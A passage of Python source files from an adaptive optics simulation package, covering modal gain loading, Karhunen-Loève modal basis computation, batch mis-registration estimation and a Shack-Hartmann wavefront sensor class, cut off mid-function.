#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
def get_modal_gains(ngs, tel, atm, dm, wfs, param, nameFolderIntMat = None):
## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
if nameFolderIntMat is None:
nameFolderIntMat = param['pathInput']+param['name']+'/'
createFolder(nameFolderIntMat)
#% get the modal gains matrix :
nameExtra = '_r0_'+str(100*atm.r0)+'_cm_'+param['opticalBand']+'_band_fitting_'+str(param['nModes'])+'_KL'
try:
nameModalGains = 'modal_gains'+param['extra']+nameExtra
except:
nameModalGains = 'modal_gains'+nameExtra
try:
data_gains = read_fits(nameFolderIntMat+ nameModalGains+'.fits')
print('Using Modal Gains loaded from '+str(nameFolderIntMat+ nameModalGains+'.fits'))
except:
data_gains = np.ones(param['nModes'])
print('No Modal Gains found. All gains set to 1')
gOpt = np.diag(1/data_gains)
return gOpt
```
#### File: AO_modules/calibration/compute_KL_modal_basis.py
```python
import numpy as np
from astropy.io import fits as pfits
from AO_modules.tools.tools import createFolder
import AO_modules.calibration.ao_cockpit_psim as aou
def compute_M2C(telescope, atmosphere, deformableMirror, param, nameFolder = None, nameFile = None,remove_piston = False,HHtName = None, baseName = None, SpM_2D = None, nZer = 3, SZ=None, mem_available = None, NDIVL = None, computeSpM = True, ortho_spm = True, computeSB = True, computeKL = True, minimF = False, P2F = None, alpha = None, beta = None, nmo = None, IF_2D = None, IFma = None, returnSB = False, returnHHt = False, extra_name = ''):
"""
- HHtName = None extension for the HHt Covariance file
- baseName = None extension to the filename for basis saving
- SpM_2D = None 2D Specific modes [dim,dim,nspm], if None then automatic
- nZer = 3 number of zernike (PTT,...) for automatic computation
- SZ = None size of the FFTs for HHt (by default SZ = 2*telescope.resolution)
- mem_available = None memory allocated for the HHt computation (default is 100 GB)
- NDIVL = None subdivision of the HHt task into ~NDIVL**2 blocks; if None, derived from mem_available
- computeSpM = True Flag to compute Specific modes
- ortho_spm = True Flag to orthonormalize specific modes (QR decomposition)
- computeSB = True Flag to compute the Seed Basis
- computeKL = True Flag to compute the KL basis
- minimF = False Flag to minimize Forces
- P2F = None Stiffness matrix (loaded by default)
- alpha = None Force regularization parameter (expert)
- beta = None Position damping parameter (expert)
- nmo = None Number of modes to compute
- IF_2D = None 2D Influence Functions (only for speeding up)
- IFma = None Serial Influence Functions (only for speeding up)
- returnSB = False Flag to return also the Seed Basis (w/ or w/o KL)
"""
if nmo is None:
nmo=param['nModes']
if deformableMirror.isM4:
initName = 'M2C_M4_'
else:
initName = 'M2C_'
if baseName is not None:
initName = initName + baseName+'_'
if nameFolder is None:
nameFolder = param['pathInput']
createFolder(nameFolder)
if nameFile is None:
try:
nameFile = initName + str(param['resolution'])+'_res'+param['extra']+extra_name
except:
nameFile = initName + str(param['resolution'])+'_res'+extra_name
# the function takes as an input an object with obj.tel, obj.atm,obj.
diameter = telescope.D
r0 = atmosphere.r0
L0 = atmosphere.L0
pupil = telescope.pupil
telescope.isPaired = False # separate from eventual atmosphere
if IF_2D is None:
deformableMirror.coefs = np.eye(deformableMirror.nValidAct) # assign dm coefs to get the cube of IF in OPD
print('COMPUTING TEL*DM...')
print(' ')
telescope*deformableMirror # propagate to get the OPD of the IFS after reflection
print('PREPARING IF_2D...')
print(' ')
IF_2D = np.moveaxis(telescope.OPD,-1,0)
nact = IF_2D.shape[0]
print('Computing Specific Modes ...')
print(' ')
GEO = aou.mkp(telescope.resolution/telescope.resolution*diameter,telescope.resolution,diameter,0.)
if nZer is not None and SpM_2D is None:
SpM_2D = aou.give_zernike(GEO, diameter, nZer)
nspm = nZer
if SpM_2D is not None:
nspm=SpM_2D.shape[2]
if SZ is None:
SZ = int(2*telescope.resolution) ## SZ=1110 for dxo=0.06944 and SZ=1542 for dxo=0.05
print('COMPUTING VON KARMAN 2D PSD...')
print(' ')
PSD_atm , df, pterm = aou.VK_DSP_up(diameter,r0,L0,SZ,telescope.resolution,1,pupil)
#%% ---------- EVALUATE SPLIT OF WORK UPON MEMORY AVAILABLE ----------
#%% ----------COMPUTE HHt COVARIANCE MATRIX (OR LOAD EXISTING ONE) ----------
#pdb.set_trace()
try:
#HHt, PSD_atm, df = aou.load(nameFolder+'HHt_PSD_df_'+HHtName+'_r'+str(r0)+'_SZ'+str(SZ)+'.pkl')
HHt, PSD_atm, df = aou.load(nameFolder+'HHt_PSD_df_'+HHtName+'.pkl')
print('LOADED COV MAT HHt...')
print(' ')
except:
print('COMPUTING COV MAT HHt...')
print(' ')
#pdb.set_trace()
if mem_available is None:
mem_available=100.e9
if NDIVL is None:
mem,NDIVL=aou.estimate_ndivl(SZ,telescope.resolution,nact,mem_available)
if NDIVL == 0:
NDIVL = 1
BLOCKL=nact//NDIVL
REST=nact-BLOCKL*NDIVL
HHt = aou.DO_HHt(IF_2D,PSD_atm,df,pupil,BLOCKL,REST,SZ,0)
try:
aou.save(nameFolder+'HHt_PSD_df_'+HHtName+'.pkl',[HHt, PSD_atm, df])
except:
aou.save(nameFolder+'HHt_PSD_df_'+initName+'r'+str(r0)+'_SZ'+str(SZ)+'.pkl',[HHt, PSD_atm, df])
#%% ----------PRECOMPUTE MOST USED QUANTITIES ----------
if computeSpM == True or computeSB == True or computeKL == True:
## VALID OPD POINTS IN PUPIL
idxpup=np.where(pupil==1)
tpup=len(idxpup[0])
## Matrix of serialized IFs
if IFma is None:
print('SERIALIZING IFs...')
print(' ')
IFma=np.matrix(aou.vectorifyb(IF_2D,idxpup))
## Matrix of serialized Special modes
print('SERIALIZING Specific Modes...')
print(' ')
Tspm=np.matrix(aou.vectorify(SpM_2D,idxpup))
## CROSS-PRODUCT OF IFs
print('COMPUTING IFs CROSS PRODUCT...')
print(' ')
DELTA=IFma.T @ IFma
#%% ----------COMPUTE SPECIFIC MODES BASIS ----------
if minimF == True:
if P2F is None:
P2F=np.float64(pfits.getdata(param['pathInput']+'P2F.fits'))*1.e6 #( in N/m)
P2Ff=np.zeros([nact,nact],dtype=np.float64)
nap=nact//6
for k in range(0,6):
P2Ff[k*nap:(k+1)*nap,k*nap:(k+1)*nap] = P2F.copy()
K=np.asmatrix(P2Ff)
del P2Ff
if alpha is None:
alpha = 1.e-12
if beta is None:
beta=1.e-6
if computeSpM == True and minimF == True:
print('BUILDING FORCE-OPTIMIZED SPECIFIC MODES...')
print(' ')
check=1
amp_check=1.e-6
SpM = aou.build_SpecificBasis_F(Tspm,IFma,DELTA,K,alpha,ortho_spm,check,amp_check)
# SpM_opd = IFma @ SpM
print('CHECKING ORTHONORMALITY OF SPECIFIC MODES...')
print(' ')
DELTA_SpM_opd = SpM.T @ DELTA @ SpM
print('Orthonormality error for SpM = ', np.max(np.abs(DELTA_SpM_opd/tpup-np.eye(nspm))))
if computeSpM == True and minimF == False:
check=1
amp_check=1.e-6
lim=1.e-3
SpM = aou.build_SpecificBasis_C(Tspm,IFma,DELTA,lim,ortho_spm,check,amp_check)
print('CHECKING ORTHONORMALITY OF SPECIFIC MODES...')
print(' ')
DELTA_SpM_opd = SpM.T @ DELTA @ SpM
print('Orthonormality error for SpM = ', np.max(np.abs(DELTA_SpM_opd/tpup-np.eye(nspm))))
#%% ----------COMPUTE SEED BASIS ----------
if computeKL == True:
computeSB = True
if computeSB == True:
#pdb.set_trace()
if minimF == False:
print('BUILDING SEED BASIS ...')
print(' ')
lim=1.e-3
SB = aou.build_SeedBasis_C(IFma, SpM,DELTA,lim)
nSB=SB.shape[1]
DELTA_SB = SB.T @ DELTA @ SB
print('Orthonormality error for '+str(nSB)+' modes of the Seed Basis = ',np.max(np.abs(DELTA_SB[0:nSB,0:nSB]/tpup-np.eye(nSB))))
if minimF == True:
print('BUILDING FORCE OPTIMIZED SEED BASIS ...')
print(' ')
SB = aou.build_SeedBasis_F(IFma, SpM, K, beta)
nSB=SB.shape[1]
DELTA_SB = SB.T @ DELTA @ SB
print('Orthonormality error for '+str(nmo)+' modes of the Seed Basis = ',np.max(np.abs(DELTA_SB[0:nmo,0:nmo]/tpup-np.eye(nmo))))
if computeKL == False:
BASIS=np.asmatrix(np.zeros([nact,nspm+nSB],dtype=np.float64))
BASIS[:,0:nspm] = SpM
BASIS[:,nspm:] = SB
if remove_piston == True:
BASIS = np.asarray(BASIS[:,1:])
print('Piston removed from the modal basis!' )
#%% ----------COMPUTE KL BASIS ----------
if computeKL == True:
check=1
if nmo>SB.shape[1]:
print('WARNING: Number of modes requested too high, taking the maximum value possible!')
nmoKL = SB.shape[1]
else:
nmoKL = nmo
KL=aou.build_KLBasis(HHt,SB,DELTA,nmoKL,check)
#pdb.set_trace()
DELTA_KL = KL.T @ DELTA @ KL
print('Orthonormality error for '+str(nmoKL)+' modes of the KL Basis = ',np.max(np.abs(DELTA_KL[0:nmoKL,0:nmoKL]/tpup-np.eye(nmoKL))))
BASIS=np.asmatrix(np.zeros([nact,nspm+nmoKL],dtype=np.float64))
BASIS[:,0:nspm] = SpM
BASIS[:,nspm:] = KL
if remove_piston == True:
BASIS = np.asarray(BASIS[:,1:])
print('Piston removed from the modal basis!' )
# save output in fits file
hdr=pfits.Header()
hdr['TITLE'] = initName+'_KL' #'M4_KL'
empty_primary = pfits.PrimaryHDU(header=hdr)
## CAREFUL THE CUBE IS SAVED AS A NON SPARSE MATRIX
primary_hdu = pfits.ImageHDU(BASIS)
hdu = pfits.HDUList([empty_primary, primary_hdu])
hdu.writeto(nameFolder+nameFile+'.fits',overwrite=True)
return BASIS
if returnSB == True:
hdr=pfits.Header()
hdr['TITLE'] = initName+'_SB' #'M4_KL'
empty_primary = pfits.PrimaryHDU(header=hdr)
## CAREFUL THE CUBE IS SAVED AS A NON SPARSE MATRIX
primary_hdu = pfits.ImageHDU(BASIS)
hdu = pfits.HDUList([empty_primary, primary_hdu])
hdu.writeto(nameFolder+nameFile+'.fits',overwrite=True)
return BASIS,SB
```
#### File: AO_modules/mis_registration_identification_algorithm/batch_estimate_mis_registrations_modulation.py
```python
"""
Created on Wed Jan 27 12:00:39 2021
@author: cheritie
"""
# common modules
import jsonpickle
import json
import numpy as np
import copy
# AO modules
from AO_modules.mis_registration_identification_algorithm.estimateMisRegistration import estimateMisRegistration
from AO_modules.mis_registration_identification_algorithm.computeMetaSensitivyMatrix import computeMetaSensitivityMatrix
from AO_modules.calibration.CalibrationVault import calibrationVault
from AO_modules.MisRegistration import MisRegistration
from AO_modules.tools.displayTools import displayPyramidSignals
import matplotlib.pyplot as plt
def batch_estimation_mis_registration(obj, basis, mis_registration_tests, flux_values, amplitude_values, r0_values,name_output, mis_registration_zero = None):
plt.ioff()
# prepare the fields
flux_fields = []
flux_names = []
for i in range(len(flux_values)):
flux_fields.append('nPhotonperSubap_'+str(flux_values[i]))
flux_names.append(' '+str(flux_values[i])+' phot/subap')
amplitude_fields = []
amplitude_names = []
for i in range(len(amplitude_values)):
amplitude_fields.append('amplitude_'+str(amplitude_values[i]))
amplitude_names.append(' Amplitude '+str(amplitude_values[i])+' nm')
r0_fields = []
r0_names = []
for i in range(len(r0_values)):
r0_fields.append('r0_'+str(r0_values[i]))
r0_names.append(' r0 '+str(r0_values[i])+' m')
# zero point and epsilon mis-registration
if mis_registration_zero is None:
misRegistrationZeroPoint = MisRegistration()
else:
misRegistrationZeroPoint = mis_registration_zero
epsilonMisRegistration = MisRegistration()
epsilonMisRegistration.shiftX = np.round(obj.dm.pitch /100,4)
epsilonMisRegistration.shiftY = np.round(obj.dm.pitch /100,4)
epsilonMisRegistration.rotationAngle = np.round(np.rad2deg(np.arctan(epsilonMisRegistration.shiftX)/(obj.tel.D/2)),4)
# location of the sensitivity matrices
nameFolder_sensitivity_matrice = obj.generate_name_location_sensitivity_matrices(obj)
# load sensitivity matrices (to do it only once)
[metaMatrix,calib_0] = computeMetaSensitivityMatrix(nameFolder = nameFolder_sensitivity_matrice,\
nameSystem = '',\
tel = obj.tel,\
atm = obj.atm,\
ngs = obj.ngs,\
dm_0 = obj.dm,\
pitch = obj.dm.pitch,\
wfs = obj.wfs,\
basis = basis,\
misRegistrationZeroPoint = misRegistrationZeroPoint,\
epsilonMisRegistration = epsilonMisRegistration,\
param = obj.param)
# dictionaries to store the output
tmp_data_amp = dict()
tmp_data_flux = dict()
tmp_data_r0 = dict()
data_out = dict()
# start
for i_r0 in range(len(r0_values)):
for i_flux in range(len(flux_values)):
for i_amp in range(len(amplitude_values)):
mis_reg_out = np.zeros([3,len(mis_registration_tests.misRegValuesX)])
gamma_out = np.zeros([basis.modes.shape[1],len(mis_registration_tests.misRegValuesX)])
for i_misReg in range(len(mis_registration_tests.misRegValuesX)):
misRegistration_cl = MisRegistration(obj.param)
misRegistration_cl.shiftX = mis_registration_tests.misRegValuesX[i_misReg]*obj.dm.pitch/100
misRegistration_cl.shiftY = mis_registration_tests.misRegValuesY[i_misReg]*obj.dm.pitch/100
misRegistration_cl.rotationAngle = mis_registration_tests.misRegValuesRot[i_misReg]
# location of the data
nameFolder_data= obj.generate_name_location_data(obj,misRegistration_cl)
# name of the files
nameFile = obj.generate_name_data(obj,flux_values[i_flux])
# read the file
try:
with open(nameFolder_data+nameFile+'.json') as f:
C = json.load(f)
output_decoded = jsonpickle.decode(C)
print('file successfully opened!')
# extract the on-sky interaction matrix
print('considering the ' +str(obj.number_push_pull)+' measurements')
print(output_decoded['demodulated_wfs_signal'].shape)
calib_misReg_in = np.squeeze(np.asarray([output_decoded['demodulated_wfs_signal'].T,output_decoded['demodulated_wfs_signal'].T]).T)
displayPyramidSignals(obj.wfs,calib_misReg_in)
displayPyramidSignals(obj.wfs,obj.calib)
plt.show()
print(calib_misReg_in.shape)
# reduce it to the considered modes
calib_misReg = calibrationVault(calib_misReg_in)
print('starting the estimation...')
# estimation script
[mis_reg, gamma, alpha ] = estimateMisRegistration(nameFolder = nameFolder_sensitivity_matrice,\
nameSystem = '',\
tel = obj.tel,\
atm = obj.atm,\
ngs = obj.ngs,\
dm_0 = obj.dm,\
calib_in = calib_misReg,\
wfs = obj.wfs,\
basis = basis,\
misRegistrationZeroPoint = misRegistrationZeroPoint,\
epsilonMisRegistration = epsilonMisRegistration,\
param = obj.param,\
precision = 5,\
sensitivity_matrices = metaMatrix,\
return_all = True,\
fast = False )
gamma = np.asarray(gamma)
alpha = np.asarray(alpha)
# values output
values_out = dict()
values_out['optical_gains_full' ] = gamma
values_out['mis_registrations_full'] = alpha
# storing the convergence value
mis_reg_out[:,i_misReg] = alpha[-1,:]
gamma_out[:,i_misReg] = gamma[-1,:]
# data out
data_out[misRegistration_cl.misRegName] = values_out
print('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%')
print('Mis-Registrations identified:')
print(r0_names[i_r0]+'--'+flux_names[i_flux]+'--'+amplitude_names[i_amp])
print('Rotation [deg] \t Shift X [m] \t Shift Y [m]')
print(str(mis_reg_out[0,i_misReg]) + '\t\t' +str(100*(mis_reg_out[1,i_misReg]/obj.dm.pitch))+'\t\t' + str(100*(mis_reg_out[2,i_misReg]/obj.dm.pitch)))
print('Mis-Registrations True:')
print('Rotation [deg] \t Shift X [m] \t Shift Y [m]')
print(str(mis_registration_tests.misRegValuesRot[i_misReg]) + '\t\t'+str(mis_registration_tests.misRegValuesX[i_misReg])+'\t\t' + str(mis_registration_tests.misRegValuesY[i_misReg]))
except:
print('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%')
print('ERROR! NO FILE FOUND FOR '+ nameFolder_data+nameFile)
print('skipping...')
print('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%')
data_out['mis_registrations'] = mis_reg_out
data_out['optical_gains '] = gamma_out
data_out['misReg_values_rot_out'] = mis_reg_out[0,:]
data_out['misReg_values_x_out'] = 100*(mis_reg_out[1,:]/obj.dm.pitch)
data_out['misReg_values_y_out'] = 100*(mis_reg_out[2,:]/obj.dm.pitch)
tmp_data_amp[amplitude_fields[i_amp]] = copy.deepcopy(data_out)
tmp_data_flux[flux_fields[i_flux]] = copy.deepcopy(tmp_data_amp)
tmp_data_r0[r0_fields[i_r0]] = copy.deepcopy(tmp_data_flux)
out=dict()
out['data_out'] = tmp_data_r0
out['r0_names'] = r0_names
out['amp_names'] = amplitude_names
out['flux_names'] = flux_names
out['r0_fields'] = r0_fields
out['amp_fields'] = amplitude_fields
out['flux_fields'] = flux_fields
out['r0_values'] = r0_values
out['amp_values'] = amplitude_values
out['flux_values'] = flux_values
out['misReg_values_x' ] = mis_registration_tests.misRegValuesX
out['misReg_values_y' ] = mis_registration_tests.misRegValuesY
out['misReg_values_rot'] = mis_registration_tests.misRegValuesRot
output_encoded = jsonpickle.encode(out)
with open(name_output+'.json', 'w') as f:
json.dump(output_encoded, f)
```
#### File: OOPAO/AO_modules/ShackHartmann.py
```python
import numpy as np
import scipy.ndimage as sp
import sys
import inspect
import time
import matplotlib.pyplot as plt
import multiprocessing
from AO_modules.Detector import Detector
from AO_modules.tools.tools import bin_ndarray
import scipy.ndimage as ndimage
try:
from joblib import Parallel, delayed
except:
print('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%')
print('WARNING: The joblib module is not installed. Installing it would considerably speed up the operations.')
print('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%')
import ctypes
try :
mkl_rt = ctypes.CDLL('libmkl_rt.so')
mkl_set_num_threads = mkl_rt.MKL_Set_Num_Threads
mkl_set_num_threads(6)
except:
try:
mkl_rt = ctypes.CDLL('./mkl_rt.dll')
mkl_set_num_threads = mkl_rt.MKL_Set_Num_Threads
mkl_set_num_threads(6)
except:
print('Could not optimize the parallelisation of the code ')
class ShackHartmann:
def __init__(self,nSubap,telescope,lightRatio,threshold_cog = 0,is_geometric = False ):
self.tag = 'shackHartmann'
self.telescope = telescope
self.is_geometric = is_geometric
self.nSubap = nSubap
self.lightRatio = lightRatio
self.pupil = telescope.pupil.astype(float)
self.zero_padding = 2
self.n_pix_subap = self.telescope.resolution// self.nSubap
self.n_pix_lenslet = self.n_pix_subap*self.zero_padding
self.center = self.n_pix_lenslet//2
self.threshold_cog = threshold_cog
self.get_camera_frame_multi = False
self.cam = Detector(round(nSubap*self.n_pix_subap)) # WFS detector object
self.cam.photonNoise = 0
self.cam.readoutNoise = 0 # single lenslet
self.lenslet_frame = np.zeros([self.n_pix_subap*self.zero_padding,self.n_pix_subap*self.zero_padding], dtype =complex)
self.photon_per_subaperture = np.zeros(self.nSubap**2)
# camera frame
self.camera_frame = np.zeros([self.n_pix_subap*(self.nSubap),self.n_pix_subap*(self.nSubap)], dtype =float)
# cube of lenslet zero padded
self.cube = np.zeros([self.nSubap**2,self.n_pix_lenslet,self.n_pix_lenslet])
self.index_x = []
self.index_y = []
# phasor to center spots in the center of the lenslets
[xx,yy] = np.meshgrid(np.linspace(0,self.n_pix_lenslet-1,self.n_pix_lenslet),np.linspace(0,self.n_pix_lenslet-1,self.n_pix_lenslet))
self.phasor = np.exp(-(1j*np.pi*(self.n_pix_lenslet+1)/self.n_pix_lenslet)*(xx+yy))
count=0
# Get subaperture indices and flux per subaperture
for i in range(self.nSubap):
for j in range(self.nSubap):
self.index_x.append(i)
self.index_y.append(j)
mask_amp_SH = np.sqrt(self.telescope.src.fluxMap[i*self.n_pix_subap:(i+1)*self.n_pix_subap,j*self.n_pix_subap:(j+1)*self.n_pix_subap]).astype(float)
# define the cube of lenslet arrays
self.cube[count,self.center - self.n_pix_subap//2:self.center+self.n_pix_subap//2,self.center - self.n_pix_subap//2:self.center+self.n_pix_subap//2] = mask_amp_SH
self.photon_per_subaperture[count] = mask_amp_SH.sum()
count+=1
self.index_x = np.asarray(self.index_x)
self.index_y = np.asarray(self.index_y)
print('Selecting valid subapertures based on flux considerations..')
self.photon_per_subaperture_2D = np.reshape(self.photon_per_subaperture,[self.nSubap,self.nSubap])
self.valid_subapertures = np.reshape(self.photon_per_subaperture >= self.lightRatio*np.max(self.photon_per_subaperture), [self.nSubap,self.nSubap])
self.valid_subapertures_1D = np.reshape(self.valid_subapertures,[self.nSubap**2])
[self.validLenslets_x , self.validLenslets_y] = np.where(self.photon_per_subaperture_2D >= self.lightRatio*np.max(self.photon_per_subaperture))
# index of valid slopes X and Y
self.valid_slopes_maps = np.concatenate((self.valid_subapertures,self.valid_subapertures))
# number of valid lenslet
self.nValidSubaperture = int(np.sum(self.valid_subapertures))
self.nSignal = 2*self.nValidSubaperture
# WFS initialization
self.initialize_wfs()
def initialize_wfs(self):
self.isInitialized = False
# reference signal
self.sx0 = np.zeros([self.nSubap,self.nSubap])
self.sy0 = np.zeros([self.nSubap,self.nSubap])
# signal vector
self.sx = np.zeros([self.nSubap,self.nSubap])
self.sy = np.zeros([self.nSubap,self.nSubap])
# signal map
self.SX = np.zeros([self.nSubap,self.nSubap])
self.SY = np.zeros([self.nSubap,self.nSubap])
# flux per subaperture
self.reference_slopes_maps = np.zeros([self.nSubap*2,self.nSubap])
self.slopes_units = 1
print('Acquiring reference slopes..')
self.telescope.resetOPD()
self.sh_measure()
self.reference_slopes_maps[self.valid_slopes_maps] = np.concatenate((self.sx0,self.sy0))[self.valid_slopes_maps]
self.isInitialized = True
print('Done!')
print('Setting slopes units..')
[Tip,Tilt] = np.meshgrid(np.linspace(0,self.telescope.resolution-1,self.telescope.resolution),np.linspace(0,self.telescope.resolution-1,self.telescope.resolution))
Tip = (((Tip/Tip.max())-0.5)*2*np.pi)
mean_slope = np.zeros(5)
amp = 1e-9
for i in range(5):
self.telescope.OPD = self.telescope.pupil*Tip*(i-2)*amp
self.telescope.OPD_no_pupil = Tip*(i-2)*amp
self.sh_measure()
mean_slope[i] = np.mean(self.signal[:self.nSignal//2])
self.p = np.polyfit(np.linspace(-2,2,5)*amp,mean_slope,deg = 1)
self.slopes_units = self.p[0]
print('Done!')
self.telescope.resetOPD()
def centroid(self,im, threshold = 0):
im[im<threshold*im.max()]=0
[x,y] = ndimage.center_of_mass(im.T)
return x,y
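# Editor's note: because the image is transposed before center_of_mass, the
# first value returned is the centroid along the columns (x) and the second
# along the rows (y) of the original image.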
#%% DIFFRACTIVE
# single measurement
def lenslet_propagation_diffractive(self,mask,ind_x,ind_y):
support = np.copy(self.lenslet_frame)
lenslet_phase = self.telescope.src.phase[ind_x*self.n_pix_subap:(ind_x+1)*self.n_pix_subap,ind_y*self.n_pix_subap:(ind_y+1)*self.n_pix_subap]
support[self.center - self.n_pix_subap//2:self.center+self.n_pix_subap//2,self.center - self.n_pix_subap//2:self.center+self.n_pix_subap//2] = lenslet_phase
norma = mask.shape[0]
ft_em_field_lenslet = (np.fft.fft2((mask*np.exp(1j*support)) * self.phasor))/norma
I = np.abs(ft_em_field_lenslet)**2
I = bin_ndarray(I, [self.n_pix_subap,self.n_pix_subap], operation='sum')
if self.cam.photonNoise!=0:
rs = np.random.RandomState(seed=int(time.time()))
I = rs.poisson(I)
if self.cam.readoutNoise!=0:
I += np.int64(np.round(np.random.randn(I.shape[0],I.shape[1])*self.cam.readoutNoise))
self.camera_frame[ind_x*self.n_pix_subap:(ind_x+1)*self.n_pix_subap,ind_y*self.n_pix_subap:(ind_y+1)*self.n_pix_subap] = I
if self.isInitialized:
[x,y] = self.centroid(I,threshold=self.threshold_cog)
self.sx[ind_x,ind_y] = (x-self.sx0[ind_x,ind_y] )
self.sy[ind_x,ind_y] = (y-self.sy0[ind_x,ind_y] )
else:
[x,y] = self.centroid(I,threshold=self.threshold_cog)
self.sx0[ind_x,ind_y] = x
self.sy0[ind_x,ind_y] = y
return I
# multiple measurements
def get_phase_buffer(self,amp,ind_x,ind_y):
support = np.copy(self.lenslet_frame)
support[self.center - self.n_pix_subap//2:self.center+self.n_pix_subap//2,self.center - self.n_pix_subap//2:self.center+self.n_pix_subap//2] = np.exp(1j*self.telescope.src.phase[ind_x*self.n_pix_subap:(ind_x+1)*self.n_pix_subap,ind_y*self.n_pix_subap:(ind_y+1)*self.n_pix_subap])
return support*amp*self.phasor
def get_lenslet_phase_buffer(self,phase_in):
self.telescope.src.phase = np.squeeze(phase_in)
def joblib_get_phase_buffer():
Q=Parallel(n_jobs=1,prefer='processes')(delayed(self.get_phase_buffer)(i,j,k) for i,j,k in zip(self.cube[self.valid_subapertures_1D,:,:],self.index_x[self.valid_subapertures_1D],self.index_y[self.valid_subapertures_1D]))
return Q
out = np.asarray(joblib_get_phase_buffer())
return out
def fill_camera_frame(self,ind_x,ind_y,index_frame,I):
self.camera_frame[index_frame,ind_x*self.n_pix_subap:(ind_x+1)*self.n_pix_subap,ind_y*self.n_pix_subap:(ind_y+1)*self.n_pix_subap] = I
def compute_camera_frame_multi(self,maps_intensisty):
self.ind_frame =np.zeros(maps_intensisty.shape[0],dtype=(int))
self.maps_intensisty = maps_intensisty
index_x = np.tile(self.index_x[self.valid_subapertures_1D],self.phase_buffer.shape[0])
index_y = np.tile(self.index_y[self.valid_subapertures_1D],self.phase_buffer.shape[0])
for i in range(self.phase_buffer.shape[0]):
self.ind_frame[i*self.nValidSubaperture:(i+1)*self.nValidSubaperture]=i
def joblib_fill_camera_frame():
Q=Parallel(n_jobs=1,prefer='processes')(delayed(self.fill_camera_frame)(i,j,k,l) for i,j,k,l in zip(index_x,index_y,self.ind_frame,self.maps_intensisty))
return Q
joblib_fill_camera_frame()
return
#%% GEOMETRIC self
def gradient_2D(self,arr):
res_x = (np.gradient(arr,axis=1)/self.telescope.pixelSize)*self.telescope.pupil
res_y = (np.gradient(arr,axis=0)/self.telescope.pixelSize)*self.telescope.pupil
return res_x,res_y
def lenslet_propagation_geometric(self,arr):
[SLx,SLy] = self.gradient_2D(arr)
sx = (bin_ndarray(SLx, [self.nSubap,self.nSubap], operation='mean'))
sy = (bin_ndarray(SLy, [self.nSubap,self.nSubap], operation='mean'))
return np.concatenate((sx,sy))
#%% self Measurement
def sh_measure(self,phase_in = None):
if phase_in is not None:
self.telescope.src.phase = phase_in
if self.is_geometric is False:
if np.ndim(self.telescope.src.phase)==2:
# reset camera frame
self.camera_frame = np.zeros([self.n_pix_subap*(self.nSubap),self.n_pix_subap*(self.nSubap)], dtype =float)
def compute_diffractive_signals():
Q=Parallel(n_jobs=1,prefer='processes')(delayed(self.lenslet_propagation_diffractive)(i,j,k) for i,j,k in zip(self.cube,self.index_x,self.index_y))
return Q
self.maps_intensity = np.asarray(compute_diffractive_signals())
self.SX[self.validLenslets_x,self.validLenslets_y] = self.sx[self.validLenslets_x,self.validLenslets_y]
self.SY[self.validLenslets_x,self.validLenslets_y] = self.sy[self.validLenslets_x,self.validLenslets_y]
self.signal = np.concatenate([self.sx[self.validLenslets_x,self.validLenslets_y],self.sy[self.validLenslets_x,self.validLenslets_y]])/self.slopes_units
self.signal_2D = np.concatenate([self.SX,self.SY])
self.signal_2D[np.isnan(self.signal_2D)] = 0
self*self.cam
else:
# set phase buffer
self.phase_buffer = np.moveaxis(self.telescope.src.phase_no_pupil,-1,0)
# reset camera frame
self.camera_frame = np.zeros([self.phase_buffer.shape[0],self.n_pix_subap*(self.nSubap),self.n_pix_subap*(self.nSubap)], dtype =float)
def compute_diffractive_signals_multi():
Q=Parallel(n_jobs=1,prefer='processes')(delayed(self.get_lenslet_phase_buffer)(i) for i in self.phase_buffer)
return Q
self.maps_intensity = np.reshape(np.asarray(compute_diffractive_signals_multi()),[self.phase_buffer.shape[0]*np.sum(self.valid_subapertures_1D),16,16])
norma = self.maps_intensity.shape[1]
F = np.abs(np.fft.fft2(self.maps_intensity)/norma)**2
F_binned = (bin_ndarray(F, [F.shape[0],self.n_pix_subap,self.n_pix_subap], operation='sum'))
if self.cam.photonNoise!=0:
rs = np.random.RandomState(seed=int(time.time()))
F_binned = rs.poisson(F_binned)
if self.cam.readoutNoise!=0:
F_binned += np.int64(np.round(np.random.randn(F_binned.shape[0],F_binned.shape[1],F_binned.shape[2])*self.cam.readoutNoise))
def joblib_centroid():
Q=Parallel(n_jobs=1,prefer='processes')(delayed(self.centroid)(i) for i in F_binned)
return Q
if self.get_camera_frame_multi is True:
self.compute_camera_frame_multi(F_binned)
self.centroid_multi = np.asarray(joblib_centroid())
self.signal_2D = np.zeros([self.phase_buffer.shape[0],self.nSubap*2,self.nSubap])
for i in range(self.phase_buffer.shape[0]):
self.SX[self.validLenslets_x,self.validLenslets_y] = self.centroid_multi[i*self.nValidSubaperture:(i+1)*self.nValidSubaperture,0]
self.SY[self.validLenslets_x,self.validLenslets_y] = self.centroid_multi[i*self.nValidSubaperture:(i+1)*self.nValidSubaperture,1]
signal_2D = np.concatenate((self.SX,self.SY)) - self.reference_slopes_maps
signal_2D[~self.valid_slopes_maps] = 0
self.signal_2D[i,:,:] = signal_2D/self.slopes_units
self.signal = self.signal_2D[:,self.valid_slopes_maps].T
self*self.cam
else:
if np.ndim(self.telescope.src.phase)==2:
self.signal_2D = self.lenslet_propagation_geometric(self.telescope.src.phase_no_pupil)*self.valid_slopes_maps/self.slopes_units
self.signal = self.signal_2D[self.valid_slopes_maps]
else:
